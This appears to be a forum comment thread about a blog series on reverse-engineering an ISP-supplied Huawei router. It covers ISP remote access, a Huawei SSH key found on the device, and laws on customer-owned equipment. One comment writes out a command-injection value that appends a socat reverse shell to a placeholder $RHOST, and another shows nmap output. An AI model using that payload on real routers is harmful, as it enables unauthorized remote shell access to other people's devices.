A detailed look at the router provided by my ISP

Interesting read! There&#x27;s actually 3 parts to this:<p>Part 2: <a href="https:&#x2F;&#x2F;0x90.psaux.io&#x2F;2020&#x2F;03&#x2F;19&#x2F;Taking-Back-What-Is-Already-Yours-Router-Wars-Episode-II&#x2F;" rel="nofollow">https:&#x2F;&#x2F;0x90.psaux.io&#x2F;2020&#x2F;03&#x2F;19&#x2F;Taking-Back-What-Is-Already...</a><p>And 3: <a href="https:&#x2F;&#x2F;0x90.psaux.io&#x2F;2020&#x2F;03&#x2F;22&#x2F;Taking-Back-What-Is-Already-Yours-Router-Wars-Episode-III&#x2F;" rel="nofollow">https:&#x2F;&#x2F;0x90.psaux.io&#x2F;2020&#x2F;03&#x2F;22&#x2F;Taking-Back-What-Is-Already...</a><p>Summary from the end of Part 3:<p>&quot;So we managed to change passwords for both ssh and telnet, gain access to Root user for the web interface, changed that password too. We changed ACS URL to ours and remove the IP restrictions. To put it simply, we cleaned up our router from our ISP. Good for our privacy.&quot;

It&#x27;s funny to think that if you were to report all of your findings to your local newspaper (Turkish newspaper in this case), as to how Turkish ISPs have complete access to your router or how Huawei (China) has an SSH key for your router, people would go absolutely ballistic. But for us it&#x27;s just another day of expected craziness and we&#x27;re tired of talking about it

In the Netherlands we now have a law where ISPs must allow your own choice of network equipment. This means they must give you the required information on how to connect your own device with their network.<p>I have a fiber connection, which I connected directly to a Ubiquity router through a suitable SFP module. My ISP supplied the information on the fiber type and which VLAN ID&#x27;s to setup for internet, TV and telephony.<p>This way I have my own equipment, that I control myself. The &#x27;modem&#x27; [0] which my ISP supplied is still in its original, unopened box.

Apparently a polish carrier called Multimedia has recently introduced a new, revolutionary service for some customers. It&#x27;s called &quot;set up a custom wi-fi configuration&quot;, and it&#x27;s just 5 pln (a little over $1)! It lets you think up of a ssid and password, and configure your router to use those! That&#x27;s an amazing invention, isn&#x27;t it? &#x2F;s<p>Some customers apparently have absolutely no access to their routers, not even to the web interface, and they can&#x27;t use their own either. All reconfiguration must be done through the customer service portal or by phone. That means the carrier can change for every little thing, including changing the Wi-Fi config! I&#x27;m not sure if you can even bridge, but I guess not. Note that this does not affect all customers of that carrier, just a minority.

Fantastic write up from a hacking point of view. I did wonder about this statement though:<p>&quot;This is very invasive and unacceptable. It may seem necessary to apply security patches published by your ISP but the user should be able to disable it whenever she wants.&quot;<p>Legally, at least in countries where I&#x27;ve lived, the ISP still owns the router. This surprised me a bit when I first found out, but then I got used to the idea, but you should treat any ISP or telecom gear in your house as something that&#x27;s &quot;rented but still owned and controlled by someone else&quot;.

it looks like this CLI has some hardcoded shell commands with variable substitutions that look possibly unprotected against command injection.<p>For example<p><pre><code> iptables %s &gt; %s 2&gt;&amp;1 </code></pre> could probably be executed as<p><pre><code> iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane &gt; &#x2F;var&#x2F;IptablesInfo 2&gt;&amp;1 </code></pre> by issuing<p><pre><code> iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane </code></pre> and therefore it might be possible to get real shell access too.

Very interesting article.<p>What about that precompiled .ssh&#x2F;authorized_keys with user z00163152@HUAWEI-627FB9A3 mentioned in Part 3?<p>Any reason why a router firmware would permit root access to anyone at all? Definitely sounds like a backdoor to me.

...and that&#x27;s why my ISPs router is running in modem mode with a non-ISP-controlled router from Ubiquiti behind it - which I may replace with a pfSense box in the future.<p>I&#x27;m pretty happy that my cable ISP is allowing this mode so I don&#x27;t have to double-NAT in my setup.

I never thought to nmap my own router until reading this.<p><pre><code> PORT STATE SERVICE 53&#x2F;tcp open domain 80&#x2F;tcp open http 631&#x2F;tcp open ipp 5000&#x2F;tcp open upnp 7777&#x2F;tcp open cbt 20005&#x2F;tcp open btx </code></pre> Now begins the three-hours-and-counting rabbit hole of trying to figure out what the hell is running on ports 7777 and 20005. Or why UPNP is apparently running, despite UPNP being explicitly disabled on the Netgear router&#x27;s admin page.

&gt; After looking into folders, I found some interesting files. I won’t go through them here but I want to mention just one of them: [$ cat etc&#x2F;ssh&#x2F;authorized_keys]. Maybe an engineer from Huawei (I assume z00163152@HUAWEI-627FB9A3) who owns a specific DSS key, can connect all HG253s routers without needing a password, who knows?<p>Who knows indeed?!

Trivia: Strictly speaking a box that does NAT is not a router in the IP protocol sense, it&#x27;s a kind of proxy. The router requirements RFC explicitly forbids altering most fields (incl the address field) in the IP header.

I am using the exact same router from the same ISP. I was wondering what the problem was when I wasn&#x27;t able to forward port 22 to my computer for an SSH connection.<p>I had thought it had something to with the ISP allocating the same static IP to multiple clients and blocking some common ports to prevent collisions (ended up using port 109.. something for SSH). Turns out it was more interesting!

Enjoyed this write-up, but most of the exploration seemed to be facilitated by someone having already leaked the CLI root password online. Anyone have suggestions on how you might otherwise obtain that information?

EU net neutrality regulation grants end users right to use their own equipment.<p><a href="https:&#x2F;&#x2F;fsfe.org&#x2F;activities&#x2F;routers&#x2F;" rel="nofollow">https:&#x2F;&#x2F;fsfe.org&#x2F;activities&#x2F;routers&#x2F;</a>

Many people here pointed out a problem: Removing access for the ISP and&#x2F;or device manufacturer means they cannot fix bugs remotely and automatically. This is bad in situations like when the Mirai malware hit.<p>How about this?: &quot;You can use your own device and we provide all required information, but there will be no advanced support and you have to check for bugfixes yourself monthly.&quot;<p>... now that I wrote it, I see the answer: There is no way to enforce this, especially not reliably.

Finally some proof that Huawei does have back doors in their network equipment.<p>In part 3 <a href="https:&#x2F;&#x2F;0x90.psaux.io&#x2F;2020&#x2F;03&#x2F;22&#x2F;Taking-Back-What-Is-Already-Yours-Router-Wars-Episode-III&#x2F;" rel="nofollow">https:&#x2F;&#x2F;0x90.psaux.io&#x2F;2020&#x2F;03&#x2F;22&#x2F;Taking-Back-What-Is-Already...</a> the author rights that a Huawei engineer has an authorized ssh key that would allow them to access your router.<p>Just Wow!

I clicked through to the two follow ups — this is both excellent sleuthery and a wonderful write up.

Slightly off-topic: I&#x27;d really like to run screenfetch on my router (Asus RT-N66U), but it doesn&#x27;t have enough free space to sftp the script to it [1]. Piping the script just freezes up. Does anyone know a good workaround? Has anyone ever tried this?<p>[1] <a href="https:&#x2F;&#x2F;unix.stackexchange.com&#x2F;questions&#x2F;510947&#x2F;how-can-i-run-a-script-on-a-unix-box-without-enough-space-to-store-it" rel="nofollow">https:&#x2F;&#x2F;unix.stackexchange.com&#x2F;questions&#x2F;510947&#x2F;how-can-i-ru...</a>

My ISP (Internode) provide a ‘modem’ for my NBN hybrid coax &#x2F; fibre connection. I just put my OPNSense router in front of it and it’s all secure. They provided me with all the config settings, which are a bit more obscure than usual (PPPoE but on a specific vlan tag). Works like a charm and I don’t have to worry about weird government wiretapping or backdoors. My ISP provide an IPv6 range too, which is pretty cool.

You&#x27;re lucky to have an SSH server active, on mine I had to open the router and dump the firmware manually :&#x2F;

My ISP has a cloud access &quot;feature&quot;. If I go to 192.168.1.1 it redirects me to their &quot;router.MYISP.net&quot; site. What&#x27;s the best way to go about disabling this? Should I just dump the rented router for my own?

Wow some good detective skills at work here , got a similar Huawei HG635 from my provider ... kept it because it supports LTE cutover.<p>Fortunately some kind person leaked the admin password so that I could configure it to my liking.

I&#x27;m overseas now, and using one of these crappy ISP-provided routers. I miss my nice Linksys router back home with high-density mesh, tri-band WiFi, and four gigabit ethernet ports.

The only router with good admin interface I ever had was one with open source software.<p>Every other router, for 20 years now, had a slow and buggy web interface.<p>Why is this?!

I very much enjoyed this! I bookmarked your site and hope to read more of your posts in the future.

A while back, I was playing around with the cable modem &#x2F; router the ISP gave me because I was curious and an idiot. After screwing around a bit, I managed to find a vulnerability that exposed technician credentials plaintext and they actually worked. Had no idea where to report it though, because the manufacturers contact page could be summed up as <i>fuck you we don&#x27;t talk directly to consumers</i>. I dont think the vulnerability was that bad, as you had to be logged in to the web interface already with another account, but still.<p>I don&#x27;t really trust ISP provided hardware &#x2F; software now though.

Why did port 8015 show up on the remote system after resetting firmware? Shouldn&#x27;t nmap have reported that?